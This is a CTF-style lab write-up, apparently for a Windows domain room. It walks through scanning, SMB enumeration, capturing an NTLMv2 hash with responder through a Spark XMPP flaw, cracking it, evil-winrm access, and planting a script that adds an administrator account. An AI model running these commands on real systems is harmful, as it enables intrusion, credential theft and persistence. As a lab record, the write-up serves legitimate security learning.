nmap
1 | nmap -Pn -vvv -T5 -p- -sC -sV 10.10.94.80 |
The scan is not over, but we already have lot of open ports:
The port 80, 445/135 should be interesting.
host
On the web page we can see the host in the network analyzer:
I need to add it to /etc/hosts
fire.windcorp.thm
openfire
On fire.windcorp.thm:9090 we have a login pannel.
I’ve tried to exploit it with metasploit but it’s not working, i should continue the enumeration.
Port 80
I found some user on the main page:
This is the default string when i curl the web page:
1 | curl -S http://10.10.94.80 | grep xmpp |
1 | curl -S http://10.10.94.80 | grep xmpp | cut -d ':' -f 4 |cut -d '@' -f 1 |
Output:
1 | organicfish718 |
Maybe it will be usefull later:
Reset password
http://fire.windcorp.thm/reset.asp
We have 4 questions.
The picture of Lily is named lilyleAndSparky.jpg.
She’s not in the user list above, the user is lilyle and the dog is Sparky.
feroxboster
On http://10.10.94.80
nothing interesting
DNS
1 | dig @10.10.94.80 windcorp.thm any |
1 | wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/others/subdomains.txt -u 'http://windcorp.thm' -H "Host: FUZZ.windcorp.thm" --hh 11334 |
Nothing interesting with feroxbuster.
Let’s add hostmaster.windcorp.thm to /etc/hosts.
smb
I will use the creds we’ve got above to enumerate the shares:
1 | python /usr/bin/smbmap.py -H 10.10.85.194 -R -u "lilyle" -p "ChangeMe#1234" |
1 | smbclient //10.10.85.194/Shared -U "lilyle" |
There is the instalation files of spark 2.8.3.
https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md
I have to install the version 2.8.3, I have few error on arch, and I need to install lot of packages.
Install spark
I need to add a repository:
Ok no problem.
Now I’m ready:
…
I’ve also tried from source, but he don’t see the new version of java so I can’t switch.
let’s try on windows:
Now I’m on windows and arch in the same time with one VPN.
I will use Arch like a router:
Local network card:
1 | 2: enp34s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 |
VPN:
1 | 7: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500 |
1 | sudo iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE |
This config is not persitent, that’s what I want.
Exploit
1 | sudo responder -I tun0 |
Then on Spark, connect with the user lilyle and the password ChangeMe#1234:
We need to add the host conference.fire.windcorp.thm to the hosts file.
It’s using xmpp, so I’ve added Buse, the xmpp user from the website.
Didn’t knew hot to add him coreclty and I had lot of network errors so, I send the message to everyone.
It was this message with the IP of Arch:
Then responder gave me the hash.
1 | [HTTP] NTLMv2 Client : 10.10.85.194 |
Yeah ! This is how I feel like:
Crack the hash
uzunLM+3131
win-rm
1 | evil-winrm -u buse -p uzunLM+3131 -i 10.10.85.194 |
Check the privs:
1 | whoami /all |
We have the BUILTIN\Account Operators who can be interesting.
The sctipt is using the account btrittancycr, we can change the password of this account.
1 | net user /domain brittanycr qweqweqweQWE123! |
SMB
1 | python /usr/bin/smbmap.py -H 10.10.85.194 -R -u "brittanycr" -p qweqweqweQWE123! |
This user is using this file via the script.
We have to download to modify it, then upload it back.
smb
1 | smbclient //10.10.85.194/Users -U "brittanycr" |
I’m adding this to the hosts file:
1 | net user peanutstick peanutstick123! /add;net localgroup Administrators peanutstick /add |
then, use